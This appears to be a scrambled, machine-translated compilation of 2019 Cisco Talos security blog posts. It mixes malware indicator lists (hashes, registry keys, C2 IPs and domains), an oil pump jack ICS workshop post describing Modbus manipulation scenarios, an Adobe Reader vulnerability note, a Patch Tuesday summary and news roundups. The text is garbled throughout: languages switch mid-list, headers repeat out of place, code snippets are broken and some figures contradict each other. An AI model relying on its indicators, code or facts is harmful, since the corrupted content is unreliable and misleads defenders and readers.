      • C1F44C795198B23F8058492BBB82A29ADDD2EEAE623A53296F019577D6A5FDE5
      • C488C9A61F7BE3A4E7B9B9C51DBEFA36C2FE7B53904D30C38F58DCC1900AEC098B
      • C72E78ABC54E7B785E666E666E0E61181C107A4CF6B9C0519146F9FBF47BA841
      • F1AA892C158EA1779A210D52B9A43124548343D27C9145456D730AA4EE
      • coverage
      • Detected screenshot
      • AMP
      • Pua. win. adware. sanctionedMedia-6818436-0
      • Invitation indicators
      • \ ↪Software↩microsoft↪Software↩windows↪windows↪ftware↩ftware↩currentVers?
      • \ Windows NT ￤ CurrentVersion ￤ IMAGE FILE EXECUTION Options ￤ Supervc. exe

      Applicable range

      Value Name: ProxyOverride

      Value Name: AutoConfigURL

      \ Windows NTCURRENTVERSION ￤ Image file execution option

      Indicators of Compromise

      • \ Windows NT image file execution option
      • \ Windows NT image file execution option
      • \ Windows NT image file execution option
      • \ Microsoft Windows NT image file execution option
      • \ Windows NT image file execution option
      • \ Windows NT image file execution option
      • \ Windows NT image file execution option
      • \ Windows NT image file execution option
      • \ Windows NT image file execution option
      • \ Windows NTCURENTVERSION Image File Execution Options
      • \Microsoft Windows NTCurrentVersion Image File Execution Options
      • \PukiWiki. exe for Microsoft Windows NT
      • \Image File Execution Options for Windows NT
      • \Image File Execution Options for Windows NT
      • \SYSTEM COPTROLSET001
      • Value Name Start
      • GlobalCLR_CASOFF_MUTEX
      • \Clr_CASOFF_MUTEX
      • RV_MUTEX
      • \RV_MUTEX.
      • 158[.]69[.]30[.]89
      • 188[.]70[.]31[.]241
        • x11[.]zapto[.]org
        • sambosaxzx[.]ddns[.]net
        • %SystemDrive%AUTOEXEC. BAT. exe
        • %SystemDrive%boot. ini. exe
        • \ʕ-̫͡-ʔ-̫͡-ʔ
        • \. exe will be executed.
        • %LocalAppData%Temp\xkkr5i_9. out %AllUsersProfile%miner AllUsersProfile%miner\sHXJvbCG. ico %LocalAppData%Temp\xkkr5i_9. 0. vb %LocalAppData%Temp\xkkr5i_9. cmdline %LocalAppData%Temp\xkkr5i_9. tmp AppData%Microsoft♪Windows♪ Start Menu♪Programs♪Startup♪Torrent♪. exe System Drive %SystemDrive%miner \ʬʬʬʬʬ \ʕ͡-ʔ-ʕ \♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪♪~ \Ъ$Recycle. Bin. exe %SystemDrive%Documents and Settings. exe
        • \Documents and Settings. exe
        • %SystemDrive%Recovery. exe
        • %SystemDrive%\366832936. exe
        • %SystemDrive%DOCUME
        • 1ADMINI
        • 1LOCALS
        • 1Temp Replica. tmp
        • System Drive %DOCUME
        • ADMINI
        • 1LOCALS
        • 1Temp
        • %TEMP%Ecw9cm3. 0. vb
        • %TEMP%_ecw9cm3. cmdline
        • %TEMP%_ecw9cm3. out
        • %TEMP%n02x2nc3. 0. vb
        • %TEMP%
        • 02x2nc3. cmdline
        • %TEMP%n02x2nc3. out
        • %TEMP%nyf8h2nv. 0. vb
        • %TEMP%nyf8h2nv. cmdline
        • %TEMP%nyf 8h2nv. out %TEMP%q8tnr4an. 0. vb %TEMP%qq8tnr4an. cmdline %TEMP%q8tnr4an. out %TEMP%xxrykc4pie. 0. vb %TEMP%rykc4pie. cmdline %TEMP%rykc4pie. out %TEMP%yjua3drf. 0. vb %TEMP%yjua 3drf. cmdline %TEMP%yjua3drf. out System Drive %Documents and Settings\Administrator ︙Start Menu ︙Programs ︙Startup ︙ Torrent. exe %SystemDrive%I386. exe %SystemDrive%IA. SYS. exe %AllUsersProfile%. exe %AllUsersProfile%\miner\366832936. ico %AllUsersProfile%miner³³. exe %AllUsersProfile%MinerIO. ico %AllUsersProfile%minerMSDOS. ico %AllUsersProfile%miner %AllU sersProfile%mineracheacheboot. ico %AllUsersProfile%miner
        • tldr. ico System Drive%RECYCLER. exe %SystemDri ve%Temp. exe %SystemDrive%Users. exe %SystemDrive%\c2d124b8466cec6b3e47c4. exe 0489f71417400080c1ebf6f5cf76655470a83f0f964a2ad54c242daf3012fa7a 0e15e99295dcf13eae 0d5a4d7a 04a55f7fab24e8f189f5ac37cc1007346007ad 1127cc0f06797cd128aa3724b5ecead3613c41fabebd143fcbf19a8d236a8fef 137b894b7f9992f26dd4e6c8d8c2a 09e886466305384b444aac2e2d9e3ee7a19
        • 1f5b1a8b9f7fb4d83bbd012d42fdc725468dc0ed29341bee4c5aa122d83f69f2
        • Asian. exe~%Systemdrive%Docume~1admini~3b3db732aa7ea25346da5ac1a4f0cb56357baf265259c9046885f889b56830da
        • Asian. exe~%Systemdrive%Docume~1admini~4a7bdf882b10e093cb0d82c61e71daaff97971f0cbaf16f61093acdfe149734f
        • 4b08ea2461afbf58ef946d1897ee5d4b2873ad2b261db005a85c4aa43ffeca09
        • 5a85a897a9e5aabf518bd1ff19339cca80543a90ce fdcca5397ac09014fc71be
        • 5da2bf905b77f3b9c4d957458cfb9f133860ddfe5dec741aac55bced51184c1c
        • 5e01d3fbd260656eaf2eb22631ec30ce8433f8288911ef552855108c773580bd
        • 638c303a097d02c40e37 90e506234cd36ea4c907166f4447f50e6f92b7429436
        • 63af1d420682171b535f222861b3bcc90c4da86363ad94a4b666bf489a245e11
        • 66a2ed3db3c55603be3a2ce301cdc71be803b18da51731373a4d23c1d5b0b1a 5
        • 6e0a7315797b5add6dc3b23abdc8d96d0d43e9470bee64f3f5fd12721acd62f9
        • 7051fca8dfa96b8ee78111d72f6945d14f82aceb94f93a891dfe6e5641512b1e
        • 71a577218ae440efb0c6b2a624d90a8713e60ab01 c525a180c15b5b2b9fa8d4e 726787ed97a97d4057caa986bd0956a80ecb446bcbdd9a1c009fb4d1ebccaee2 76b63d0d32b961663c20a01bd478d5cb1358eb1441be a38e2cb8e57c36e0ac41 検出のスクリーンショット
        • AMP Win. Ransomware. Gandcrab-6843341-0 侵害のインジケータ \softwareware ￤microsoft ￤windows ￤currentversion ￤internet settings 値の名前 ProxyEnable 値名：ProxyEnable 値名：ProxyServer 値名：ProxyServer 値名：ProxyOverride Global\pc_group=WORKGROUP& ransom_id=4a6a799098b68e3c \プロキシサーバ値： Proxyverride 66[.]171[.]248[.]178 ipv4bot[.]whatismyipaddress[.]com nomoreransom[.]コイン nomoreransom[.]bit ガンドクラブ[.]ビット dns1[.]soprodns[.]ru dns2[.]sopro dns[.]ru %AppData%\Microsoft\Crypto\RSA\S-1-5- 21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 %AppData%\Microsoft\Protect\S-1-5- 21-2580483871-590521980-3826313501-500\Preferred Parry Internet Files ￤Content. IE5 ￤C5MZMU22 ￤ipv4bot_whatismyipaddress_com[1]. htm %LocalAppData% ￤Microsoft￤Windows￤Temporary Internet Files￤IE5￤SSZWDDXW￤A71QDCIP. htm %LocalAppData%& lt;/p& gt; Microsoft& lt;/p& gt; Windows& lt;/p& gt; Temporary Internet Files& lt;/p& gt; IE5& lt;/p& gt; SSZWDDXW& lt;/p& gt; A71QDCIP. htm %AppData%& lt;/Microsoft\Win32Pipes. 00000328. 0000003d \Win32Pipes. 00000328. 00000041
        • %AppData%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\bb5ca9a3-5378-4a8e-8196-42a28d9ef0c9
        • %AppData%\Microsoft\hjunhw. exe
        • 00e77dd692525ac51843e571dc4401ad383b01f3789a96ad952ad46e9bc30d5d
        • 01ad099c08042d05bcc5c708aeca7a3479f93def36318469c05b3fe2c25a202d
        • 01d3aedbbcfde336cf132fa52fb87f0a39a7e1c55cf8e30e8f79df6fa6cf2a28
        • 021f152e82d84617ac2ba999f436fcf85f35c9c17da8f7adff51d6f6c332c63f
        • 072a1a933df1fe1e0c90b07b30bf82dcc16fd860e47ac94877c25c05b89a1147
        • 087af2abcf44ec68d9f1f55bcbae03e12ff0380ceea4f2197fff9b8d353f417e
        • 098af1ba0b5cf4d27f8122eb37bc7ab009be4f6c812e990639931d8504d3619c
        • 0d20371ebb39d45616ecdc0ebd1ae457f98641a14c8cd3c94e553fe5cb71e128
        • 0e90f5195c0f0c81cd631c90809790490a7a5cac5eae61bf27332b9707f9e3f3
        • 0ffd01cae290d5ff33af6dcd087646bf86a065fd02f196b7dd3afe0bb5c08d75
        • 103f6e49c97ec73d623231fa92f418032ad223c565a7fadb238cc676a6bee79a
        • 110084e96789b6e657a8453d8614c14344e03ca4dac55076afe7ba605a68ca06
        • 112dcf3ef406642f9b2459a27dc79f626d28ac93db3482691eda8db3bbafd80b
        • 119238f37579434b540e2a4cda59261d86e9a9ac0c059dfd2daf699c5a3e6094
        • 1388310e5f683da4ad3e774923c2616a7137dc1da691efea313fccd2a0f88da1
        • 1694e9584805e55badf8da9ce6f8b4122e3bf419bfb22070d3e97b83be0caa73
        • 17517aac50cfcb9b6cd779f466d6ece0ec930071fc58e7b4b391a8e79a7ef49d
        • 1c4b31ea552e67d0e573cc3c4f4c93387e79e931e41742129dcf7b1cdc55d4d5
        • 1c700576a51cdbee44a25972503a64ebc9d4fef602b4702fca9eb02e8622a7dc
        • 1ced683893408d370315083efe988043cb72a864a03a3ded4a94d047d2bec262
        • 1d4f89c1ecd931c4b5cecfba15b76f1d6607417af487654da1d50497bcda1cd9
        • 1e1b83c79a5d2ff5ec3ca325debdb29f66d83f362d2bf0ec4e18c6fbafd6c179
        • 1eff09710c639869bef51b90404569a7917aa23afdd290c8668e617b1757a231
        • 20be9f6a086f07dfc3fbd8a5e6a060e50f360629e428077665980f6e6e401079
        • 20c45b4970eddc186e8e77266e5b2282c6faf4d53559482200c4d43404d23f7a
        • カバレッジ
        • 検出のスクリーンショット
        • Cisco Talos の新しいオイルポンプジャックワークショップから学べること
        • 2019 年 2 月 11 日午前 8 時 2 分
        • Paul Rascagneres は、Cisco Talos ARES（Advanced Research/Embedded Systems）の Patrick DeSantis からの寄稿を受けて、このブログ記事を執筆しました。
        • エグゼクティブサマリー
        • Every day, more industrial control systems (ICS) are vulnerable to cyber attacks. When such a huge and important machine is connected to the network, the attacker is more likely to interfere with its operations, and for those who protect the network of the tissue, all possible attack vectors It will be difficult to cover. In order to show how ICS interacts with the network, a 3D printed petroleum pump jack model connected to a mock programmable logic controller (PLC) that supports two industrial protocols has been released. Masu. Throughout the year, Talos prepares this model in several workshops so that the participants can actually try it. For convenience, you can also provide blueprints and code and try it at home.
        • Pump Jack's 3D print model, Arduino's source code (including Modbus Over TCP and Ethernet/IP protocol), and Human Machine Interface (HMI), which controls pumps via the network.
        • In order to show how serious that the attacker controls this device in the real world, it shows how the pump reacts when the motor speed is increased to a natural pace. GIF is shown below.
        • Description of hardware
        • Global architecture
        • The project is divided into seven parts:
        • 3D printed parts.
        • A pump controlled by the motor.
        • A gauge showing the speed of the motor operating by the servo motor.
        • Arduino UNO board that is the brain of the pump and simulates PLC.
        • Arduino shield compatible with Ethernet.
        • A motor shield that manages motor and smoke generator.
        • HMI developed by Python and Flask, remotely monitoring and controlling pumps.
        • Oil Pump Jack 3D object

        Applicable range

        Value Name: ProxyOverride

        Value Name: AutoConfigURL

        Object 3 is a place where three boards are located. It also includes a gauge indicating the speed level.

        Indicators of Compromise

        • The electronic components that function as a system controller consist of one Arduino board (Arduino Uno), two shields (Ethernet and motor), one servo motor, one motor, and smoke generator.
          • Global\552FFA80-3393-423d-8671-7BA046BB5906
          • PEMD4
          • PEM19C
          • Arduino
          • Arduino's source code can be downloaded from GitHub. There are two projects: The first project supports the modbus over TCP protocol, and the second is Ethernet/IP protocol. In each project, I used Python script, HMI, protocol scanner, or communication PCAP to test communication.
          • I will explain about Arduino's GPIO pin.
          • Motor A (main pump motor) is controlled by PIN 6 (PWM) and 7 (direction).
          • Motor B (smoke generator) is controlled by PIN 9 (PWM) and 12 (direction).
          • PIN 8 is used in the speed gauge.
          • The motor speed is defined by any value between 5, 000 and 15, 00 0-by default to 8, 000. Please be careful about this. If the speed is too high, the pump may be broken.
          • The IP of the pump controller is set static to 10. 10. 10. 1, but it can be easily changed with the setup () function.
          • In the modbus over TCP protocol, the speed is in register 6 and the gauge value is in register 7. The register is a 1 6-bit object in the modbus protocol.
          • In the Ethernet/IP protocol, the speed is B1: 1 and the gauge is B1: 7. BX: Y is a tag used by Ethernet/IP to save values.
          • Use the Arduino IDE serial port to get debugging during the pump operation.
          • Implementation protocol
          • Modbus on TCP/IP
          • Modbus on TCP/IP
          • Read coil 0x01
          • Read the register 0x03
          • Writing coil 0x05
          • Write a register 0x06
          • Write multiple coils 0x0F
          • Write multiple registers 0x10
          • Acquisition of device information 0x43
          • The value of the coil is stored in the C [] array, and the value of the register is stored in the R [] array. The pump uses a register only to store the pump motor speed and gauge value.
          • Devices can be contacted using the Pymodbus API. The following is an example of output:
          • From pymodbus. Sync IMPORT MODBUSTCPCLIENT IMPORT SYSTCPCLient S (6, 1) Print (Result. Registers) Result2 = Client. Read_Holding_registers (7, 1) Print (Result2. REGISTERS) from Pymodbus IMPORT me_message RQ = mei_message. READDEVICEINFORMATIONREST () Result3 = Client. execute (RESULT3. INF) ORMATION) Client. close ()
          • User@lab:
          • ./pumpjack_project/arduino_modbus/python$./test. py [8000] [73] (Japanese)
          • Ethernet/IP
          • The second protocol used in industrial infrastructure has been implemented: Ethernet/IP has been implemented. This protocol is adapted to Ethernet with Common Industrial Protocol (CIP). This protocol is not completely implemented and supports only tags and writing. Supports Micrologix or SLC PLC protocols. The protocol is similar to the modbus protocol, but also includes the concept of session ID. The session is included in the implementation.
          • The current version supports BX: X and NX: X tags.
          • Devices can be inquired using the PyComm API. The example is the following:
          • From pycomm. Ab_comm. slc IMPORT DRIVER AS SLCDRIVER Import Logging C = SlcDriver () Def Read_val (Num) PEN ('10 . 10. 10. 1 ' ): Read_val (1)
          • User@lab:
          • /pumpjack_project/Arduino_enipcip/python $ ./test. py 8000
          • Human Machine Interface (HMI)
          • Finally, we provide HMI to manage the pump. This is developed in Python, creates a web server using flask and communicates with pumps using pymodbus. This is an interface screenshot:
          • The web server first uses the "Get Device Information" (0x43) command to get a pump device name and version via the Modbus Over TCP protocol. Next, get the motor rotation speed and the gauge value. This value determines the gauge level on the web page. By clicking the increase / decrease button, the motor speed increases and decreases by using the Modbus protocol and changing the value of the register 6.
          • Example of workshops
          • There are many ways for researchers use this system to study the potential attack vector of oil pump jack. For example, it can be used to understand two ICS protocols that are not encountered in conventional IT networks. You can create a packet capture of network traffic on HMI and perform additional analysis on Wireshark. The buil t-in Wireshark decoration analyzes the modbus over TCP perfectly. The device of the Ethernet/IP protocol is not very robust, but it can be partially decoded. JARED RITTLE of Cisco Talos has published past research using Wireshark Disector.
          • Another scenario is to scan local networks to identify the modbus system, enumerate the value stored in the coil and registers, and change the pump operation. If you are interested in ICS attacks such as Stuxnet, a malicious worm that attacks the SCADA system, you can affect the HMI system and change the information provided to the operator from HMI.
          • The scenario is all aggressive. We recommend that you solidify your defense. For example, Snort® supports modbus over TCP. With this module, you can monitor traffic, block requests from unauthorized IPs, identify large scanning, and keep the registers from putting large values ​​in register/ coil.
          • Conclusion
          • We hope that these materials will help researchers to understand the industrial protocol, especially the Modbus Over TCP and Ethernet/IP. These two protocols are not authenticated protocols that are always used in production sites. In the example, I saw how to change the internal value of PLC (Arduino Uno). However, PLC programming is also executed in this protocol. The actual PLC allows you to program using the same protocol, replace the original code, and apply patches. O For details of the actual PLC attack, we recommend our white paper "process control by counterfeit communication": Using the buil t-in function and owns PLC.
          • We have decided to publish projects so that as many people as possible can access. Do not hesitate to contribute to this project by adding functions to the implemented protocols or adding new protocols. We are accepting pull requests on our GitHub.
          • Vulnerability Spot Light Adobe Acrobat Reader DC Text Field Vulnerability for Remote Code Execution
          • February 12, 2019 9:26 AM

          Applicable range

          Value Name: ProxyOverride

          Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to execute code remotely on a victim's machine. If an attacker tricks a user into opening a specially crafted PDF that contains certain JavaScript, it could trigger a heap corruption. The bug could also be triggered if the user opens a specially crafted email attachment.

          Cisco Talos has worked with Adobe to ensure that these issues are resolved and that an update is available to affected customers.

          Vulnerability Details

          Adobe Acrobat Reader DC Text Field Value Remote Code Execution Vulnerability (TALOS-2018-0714)

          Adobe Acrobat Reader supports embedded JavaScript in PDFs to enable more user interaction. However, this gives attackers the ability to precisely control the memory layout, creating an additional attack surface. If an attacker tricks a user into opening a PDF with two specific lines of JavaScript code, it can trigger an incorrect integer size promotion, leading to heap corruption. The heap can be corrupted to the extent that an attacker can execute arbitrary code on the victim's machine.

          For more information, please read the vulnerability advisory here.

          Tested Versions

          Talos has tested and confirmed that Adobe Acrobat Reader DC 2019. 8. 20071 is affected by this vulnerability.

          Applicability

          The following SNORTⓇ rules will detect exploitation attempts. Please note that additional rules may be released in the future, and the current rules may be subject to change pending additional vulnerability information. For the latest rule information, please refer to your Firepower Management Center or Snort. org. Microsoft Patch Tuesday - February 2019: Vulnerability Disclosures and Snort Coverage

          • February 12, 2019 11:55 AM
          • Microsoft released its monthly security update today, disclosing various vulnerabilities in multiple products. The latest Patch Tuesday covers 69 vulnerabilities, of which 20 are rated "important," 46 are rated "important," and 3 are rated "moderate." The release also includes an important security advisory for Adobe Flash Player security updates.
          • This month's security update covers various security issues of Microsoft products, including CHAKRA script engine, Internet Explorer and Exchange web browser. For these vulnerabilities, see this Snortⓡ blog post.
          • Severe vulnerability
          • Microsoft published 20 serious vulnerabilities this month, including 12 of them.
          • CV E-2019-0590, CVE-2019-0591, CVE-2019-0593, CVE-2019-0640, CVE-2019-0642, CVE-2019-0644, CVE-2019-0651, CVE-2019-0652, CVE- 2019-0655 is a vulnerability of memory destruction in Microsoft's script engine. All of these bugs are lurking in how the engine is processing objects on memory in the Microsoft Edge web browser. The attacker abuses this vulnerabilities to destroy the memory of the machine, and eventually the current user's context can execute the code from remote. Users can trigger this bug by accessing malicious web pages while using Edge or accessing specially crafted content created by the attacker.
          • The CVE-2019-0606 is a vulnerability of memory destruction in Microsoft Internet Explorer. This is the way web browser accesses objects in memory. Attackers may abuse this vulnerabilities by deceiving the user and accessing the specially crafted websites and content created by the Internet Explorer. With this vulnerability, the attacker will be able to execute the code from the current user's context.

          The CVE-2019-0645 and CVE-2019-0650 are vulnerability of memory destruction existing in Microsoft Edge if the web browser cannot properly handle the object in memory. Attackers may abuse this vulnerabilities by deceiving users and browsing crafted websites with malicious intentions or clicking specially crafted content. The attacker may use this bug to gain the ability to execute any code in the current user's context.

          These are other important vulnerabilities:
          • Important vulnerability
          • This release also includes 46 important vulnerabilities:
          • CVE-2019-0540

          CVE-2019-0595

          CVE-2019-0596

          CVE-2019-0597

          CVE-2019-0598

          CVE-2019-0599

          CVE-2019-0600

          CVE-2019-0601

          CVE-2019-0602

          • CVE-2019-0610
          • CVE-2019-0613
          • CVE-2019-0615
          • CVE-2019-0616
          • CVE-2019-0619
          • CVE-2019-0623
          • CVE-2019-0625

          CVE-2019-0627

          CVE-2019-0628

          CVE-2019-0630

          CVE-2019-0631

          • CVE-2019-0632
          • CVE-2019-0633
          • CVE-2019-0635
          • CVE-2019-0636
          • CVE-2019-0637
          • CVE-2019-0648
          • CVE-2019-0649

          CVE-2019-0654

          CVE-2019-0656

          CVE-2019-0657 CVE-2019-0658~CVE-2019-0659

          CVE-2019-0660

          CVE-2019-0661

          CVE-2019-0664

          CVE-2019-0668

          CVE-2019-0671 CVE-2019-0658~CVE-2019-0673

          CVE-2019-0674

          CVE-2019-0675

          CVE-2019-0676

          CVE-2019-0686

          CVE-2019-0728

          Middle

          This release also had three medium vulnerabilities: CVE-2019-0641, CVE-2019-0643, CVE-2019-0670.

          Conclusion

          Following these vulnerabilities, Talos will release the following Snortⓡ rules that detect attempts to abuse these vulnerabilities. Please note that additional rules may be released in the future, and the current rules may be changed after waiting for additional information. If you are using Firepower, update the SRU and use the latest rules set. Open source SNORT Subskrivarur set customers can maintain the latest status by downloading the latest rule packs that can be purchased in Snort. org.

          Beer and TALOS Episode #46th "Privacy PWND: EXILERAT and Bad Karma Collection

          February 14, 2019 10:31 am

          BEERS WITH TALOS (BWT) Podcast EP. #46 has been released. Download this episode and subscribe to Beers with Talos: Click here if you are not good at iTunes or Google Play.

          Adobe Acrobat Reader DC Text Field Value Remote Code Execution Vulnerability (TALOS-2018-0714)

          Included on February 1, 2019

          Today, the threat of filling the gap between privacy infringement and classical cyber security threats, that is, pursuing voices of the opposition, and discussing malware and systems that use their own devices as reconnaissance tools for them. Masu. The two cases listed in this EP are Trojan's EXILERAT, which is distributed via a malicious Office document targeting the supporters of the Tibetan exile government, and at least one nation targeted. Basically, it is a zer o-touch tool kit "KARMA" used to remote all valuable data. In the next episode, we plan to delve into the privacy concept as a basic human right, with special guests (hints: Michel Denenda), so please take a look at the next EP.

          Timeline

          topic

          01:15 --Tal k-Craigs are hostage,#BWT's hashtag jacked, crazy gang's simple history 15:0 0-EXILERA T-A Lucky Ca t-related attacks related to Tibet 27:0 4-The overlin e-the story of the karma operator

          link

          Special feature Craig Williams (@security_craig), Joel Esler (@joelesler), Matt Orney (@kpyke), Niger Horton (@englishlfc). The moderator is Mitch Nef (@mitchNeff). Click here for all episodes.

          Click here for opinions and requests about topics: BeerSwithtalos@cisco. com

          Applicable range

          February 15, 2019 7:00 am

          Welcome to this week's Cyber ​​Security Week in Review. Here are some of the news that Cisco Talos should know in the security world. For other news delivered every week, please register with the Threat Source Newsletter here.

          This week's top news

          Email provider VFEMAIL announced that it has been attacked by "catastrophic" cyber attacks. The company warned that e-mail for about 18 years could be lost forever. "All file servers have been lost and all backup servers have been lost. Strangely, not all VMs share the same authentication, all destroyed. This is a mult i-password by SSH. It was more than an abuse, and there was no ransom, "said Vfemail.

          Russia is considering isolation from the world's Internet. Kremlin is experimenting with new practices that do not go through domestic web and only in Japan. The country will conduct a test in the second half of this year to test cyber defense.

          Apple has announced a correction program for multiple security defects. Two of these vulnerabilities were discovered by Google's threat research team and were misused in a unpopular state. The bug may allow the attacker to escalate the authority and ultimately take over the device.

          From Talos

          Microsoft has announced the monthly security update this week, revealing that some products have various vulnerabilities. The latest patch tuday covers 69 vulnerabilities, which are "important", 46, and three are "moderate". The release also includes important security recommendations on Adobe Flash Player security updates.

          Adobe has released some security updates for some products, including Flash and Acrobat Reader. Cisco Talos has discovered particularly vulnerabilities for execution of remote code, especially on Adobe Acrobat Reader DC. Attackers can cause a heap overflow and obtain code execution authority by deceiving the user and opening a specially crafted PDF.

          With a new tool from Talos, you can investigate the effects of cyber attacks on oil pump jacks. We have released a 3 D-printed 3 D-printed pump jack, which is "hacked" from a smartphone and finally overheated. In addition, this exhibition will be around this year.

          Malware

          A new subspecies of ASTAROTH Troy wood horses target Brazil through multiple spam campaigns. When infected, the malware can steal the user's personal information and use some obfuscation technology to make it difficult to detect. This spam email attacks users in some Europeans.

          The US credit union received a fishing email last week for money laundering measures. The fake email claims that it has information about the fraudulent telegram, indicating suspicion transactions, and seeking to open a PDF, including links to malicious web pages. The attacker used information that only the US Credit Union Management Bureau was available.

          • Google has deleted malware that steals cryptocurrency from the store. The malicious apps were pretending to be a regular metamask service. When downloaded, steal login authentication information to steal the user's Ethereum fund.
          • Other news
          • Blockchain technology can help detect a deep fake video, especially in the police body camera. A new tool called Amber Authenticate is run on the camera background and records a video hash. All of these results are recorded in the public blockchain.
          • India has requested Facebook to provide a backdoor for the messaging application to the country. As a result, Facebook needs to provide the government to access the secretly encrypted message of the secret.
          • Two U. S. House of Representatives have requested a survey on foreign VPN services. Senator and others have stated that these companies could bring national security risks.
          • Threats from February 8 to February 15th
          • February 15, 2019 3:03 pm
          • Today, Talos will release information that can glimpse the most common threats observed between February 8 and February 15. Like the conventional omnibus, this post is not intended for detailed analysis. Instead, this post summarizes the threats observed by the Company by emphasizing the characteristics of major actions, the indicators of infringement, and explaining the methods that our customers are automatically protected from these threats. Masu.
          • As a note of caution, the information on the following threats in this post is not exhaustive and is current as of the publication date. Also, keep in mind that searching for IOCs is only one part of threat hunting. Finding a single IOC does not necessarily indicate malicious intent. Detection and coverage for the following threats may be updated pending additional analysis of the threat or vulnerability. For the most up-to-date information, please refer to the Firepower Management Center, Snort. org, or ClamAV. net. For each threat below, this blog post lists only 25 of the relevant file hashes. The attached JSON file contains the complete list of file hashes, as well as all other IOCs in this post. As always, please remember that all IOCs in this document are indicators, and no single IOC indicates malicious intent.
          • The most common threats covered in this roundup are:
          • Win. Virus. Expiro-6854765-0 Virus Expiro is a known file infector and information stealer that thwarts analysis with anti-debugging and anti-analysis tricks.
          • Win. Malware. Swisyn-6854761-0 Malware This family is packed and has anti-analysis tricks to hide its behavior. The binaries drop other executables that are executed and attempt to inject malicious code into the address space of other processes.
          • Win. Dropper. Ribaj-6855378-0 Dropper This family is written in . NET and is very malicious. When executed, these samples drop files in Windows directories, modify other applications, and spawn multiple child processes. These binaries also modify Internet settings and certificates on the victim's machine, as observed in Windows Registry activity.
          • Doc. Malware. Valyria-6855449-0 Malware These variants of Valyria are malicious Microsoft Word documents that contain embedded VBA macros that are used to distribute other malware.
          • Win. Malware. Cgok-6854725-0 Malware These binaries are capable of detecting virtual machines and instrumented environments. They may also use anti-assembly and anti-debugging techniques to complicate analysis. This family can install additional software and upload information to a remote server.
          • Win. Malware. Noon-6854584-0 Malware This family is highly malicious and executes other binaries. These samples contact a remote server, upload information collected on the victim's machine, and provide persistence.
          • Threat
          • Win. Virus. Expiro-6854765-0
          • Indicators of Compromise
          • \Software
          • \ソフトウエア
          • \Windows CurrentVersion ￤Internet Settings ￤Zones
          • \Software Microsoft Windows Pty.
          • \Windows CurrentVersion ￤Explorer ￤Shell Folders
          • \Software ￤Microsoft Windows ￤CurrentVersion ￤Internet Settings ￤Zones
          • \Microsoft Internet Explorer の設定
          • TermService_Perf_Library_Lock_PID_194
          • kkq-vx_mtx87
          • \BaseNamedObjects\gazavat-svc
          • \kkq-vx_mtx1
          • \Elemented Objects?
          • \Đọczyć?
          • \ROUTER
          • \全ユーザーのバックアップ-CâuDW20. EXE
          • \￤CacheAll Users ￤Cdwtrig20. exe
          • \￭CacheAll Users ￭Cacheose. exe
          • %ProgramFiles%Outlook Express\msimn. exe
          • %ProgramFiles%Outlook Express\wab. exe
          • \SfcApi
          • %ProgramFiles%Java\jre7\bin\java. exe
          • %System32%tlntsvr. exe
          • etNtControlPipe14
          • %ProgramFiles%↩Internet Explorer
          • %ProgramFiles%Outlook Express\msimn. vir

          %ProgramFiles%Outlook Express\wab. vir

          %System32%narrator. exe

          Applicable range

          0759d83a9d783572b6f1f57399525c8f901ffdb41b536c19e6e70b7764ea8b78

          182fe9f51e9347bae5930e28b842f6b0558dae8bf0b2c108704465b971fcf6bc

          2d2c5852cbe5414ba1a9775295556499f44850e5b8c5162b6a7d9a5a4a877c99

          3de0bb06e54b51c42eebc77788e36675e9ec8bab5b31cba456411e507b80c1eb

          56498da2cafc996346f167c1f1abfd0e6c4011870a6981607b4eaa520eac3f37

          58571a14a78bfe4d51116c1e2a6127446c98a43e4779a769028b84199b349152

          7a72f9e0562311df35d0f40a609aaedaa3027455197180c0c5a931651c1fe600

          8adbf00c308922f3c064644c3ade097501cb2be2e79f77b1b32cfee91f140121

          93dcbe4d4d2bb9f6b0a454312008914485882521ac9ed7fe109cf5e4dd161427

          b3795e744b4ba084946e43e66bb01f05dff180f1302e6219c9f196a220ef7f09

          bcc7a15e9397bf7a58ce3b00bc5cba858738c292f501f376795e7f17fa019325

          ffee8a3dcc7f1eea25d35586024db359dbe4bcd6e8d6ad5aecb55a8b82ee5487

          カバレッジ

          検出のスクリーンショット

          AMP

          スレットグリッド

          Welcome to this week's Cyber ​​Security Week Inn Review! Here are some news that Cisco Talos should know in the security world. For other news delivered every week, please register with the Threat Source Newsletter here.

          This week's top news

          • 検出範囲
          • 検出のスクリーンショット
          • Win. Dropper. Ribaj-6855378-0

          From Talos

          • \ソフトウエア
          • \Microsoft System Certificates
          • \Fedora Fedora Fedora Fedora

          Malware roun d-up

          • \Certificates を許可しない。
          • \ソフトウエア
          • \￤TrustedPeople

          Other news

          • \Administrators
          • \Administrators
          • \￤SoftwareMicrosoft￤SystemCertificates￤trust

          \ソフトウエア

          RasPbFile

          LocalMSCTF. Asm. MutexDefault1

          Note that the following threats described in this post are not comprehensive but as of the date of announcement. Also keep in mind that IOC search is only part of threat hunting. Finding a single IOC doesn't always mean you're malicious. The following detection and coverage of the following threats may be updated until the additional analysis of threats or vulnerability is performed. For the latest information, see Firepower Management Center, Snort. org, or Clamav. net. The following threats include only 25 of the related file hashes. The attached JSON file contains a complete list of file hash and all other IOCs in this post. As usual, keep in mind that all the IOCs contained in this document are indicators and one IOC is not malicious.

          The most common threats featured in this omnibus are as follows:

          • 46[.]4[.]111[.]124
          • 79[.]137[.]116[.]43
          • 151[.]80[.]42[.]103
          • %ProgramFiles%HncUtilsHncUtilsHmedia@AlbumMaker. exe
          • %ProgramFiles%Hnc
          • %ProgramFiles%HncHncUtils\Update\HncCheck. exe

          Threat

          %SystemDrive%xx997y. exe

          Indicators of Compromise

          • システムドライブ
          • %LocalAppData%Temp\suqv362h. cmdline
          • %LocalAppData%Temp\suqv362h. err
          • %LocalAppData%Temp\suqv362h. out
          • %LocalAppData%Temp\suqv362h. tmp
          • %LocalAppData%Temp\suqv362h. cmdline
          • %LocalAppData%Temp\suqv362h. out
          • %SystemDrive%TEMP\x915y. exe
          • %SystemDrive%p155h. exe
          • %SystemDrive%x458y. exe
          • %SystemDrive%x578y. exe
          • 06a416703a26e095bc95fec44dc4751c5791ab9e1c99018c95e9d09282e3d4b0
          • 0b29c1eecbeada06924782aec009d8acf4a76893bd773a269b64a45fb3100ace
          • N/A
